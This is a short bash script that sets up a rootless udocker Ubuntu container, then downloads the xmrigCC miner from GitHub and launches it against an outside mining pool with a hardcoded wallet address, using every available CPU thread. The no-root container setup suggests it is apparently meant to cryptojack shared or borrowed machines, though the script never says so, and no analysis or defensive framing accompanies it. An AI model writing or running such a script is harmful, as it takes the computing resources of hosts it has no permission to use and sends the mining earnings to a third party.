#!/bin/bash
export LC_ALL=C
export LANG=C
curl https://github.com/indigo-dc/udocker/releases/download/1.3.17/udocker-1.3.17.tar.gz -L -o udocker-1.3.17.tar.gz
tar zxvf udocker-1.3.17.tar.gz
export PATH=`pwd`/udocker-1.3.17/udocker:$PATH
udocker pull ubuntu:latest
udocker create --name=latest ubuntu:latest
udocker  run latest /bin/bash

udocker
echo
apt update && apt -y install unzip wget curl libncurses6 libncursesw6
curl https://github.com/Bendr0id/xmrigCC/releases/download/3.4.9/xmrigCC-3.4.9-linux-generic-static-amd64.tar.gz -L -o xmrigCC-3.4.9-linux-generic-static-amd64.tar.gz
tar xf xmrigCC-3.4.9-linux-generic-static-amd64.tar.gz
./miner/xmrigDaemon -a rx/wow -o randomx.rplant.xyz:7162 -u Wo4wBGZX7fq2cNG65PfwHH6D7s3aJz71bGPuJ7mwtNSf6cPsQsP8ihJAAT7fnk2Uf3LBH4BcMBER4jkFKHPkuXd732397gLRJ.xxx -p webpassword=x -t $(nproc --all)
